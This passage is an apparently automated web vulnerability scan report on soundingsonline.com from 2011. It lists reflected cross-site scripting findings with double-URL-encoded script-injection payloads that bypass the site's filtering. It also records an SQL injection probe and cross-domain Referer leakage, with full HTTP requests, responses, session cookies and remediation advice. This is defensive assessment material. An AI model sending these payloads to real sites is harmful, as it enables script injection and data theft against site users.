Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/mishaps-a-rescues?6e5db"><script>alert(1)</script>cfbc5b7ba90=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.70. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bab04"><script>alert(1)</script>677f804dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/sailing?bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/sailing?bab04"><script>alert(1)</script>677f804dff5=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.71. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f32ed"><script>alert(1)</script>a3e3aae6e23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/todays-top-stories?f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/todays-top-stories?f32ed"><script>alert(1)</script>a3e3aae6e23=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.72. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9db0b"><script>alert(1)</script>03dbd69e9aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /resources?9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/resources?9db0b"><script>alert(1)</script>03dbd69e9aa=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.73. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1055c"><script>alert(1)</script>7769fd725aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-map?1055c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7769fd725aa=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/site-map?1055c"><script>alert(1)</script>7769fd725aa=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.74. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eeb93"><script>alert(1)</script>6761baa2a47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /subscription-services/preview-current-issue?eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services/preview-current-issue?eeb93"><script>alert(1)</script>6761baa2a47=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

3. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://www.soundingsonline.com/archives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

4.2. http://www.soundingsonline.com/component/chronocontact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /component/chronocontact/?chronoformname=PSPage HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=58g&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

4.3. http://www.soundingsonline.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<td style="text-align: left;"><a href="http://www.boats.com"><img src="/images/buttons/boatscom.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.boattrader.com"><img src="/images/buttons/boattrader.jpg" style="border: medium none; float: right;" />
...[SNIP]...
<br /><a href="http://www.yachtworld.com"><img style="border: medium none; float: right;" src="/images/buttons/yachtworld.jpg" />
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
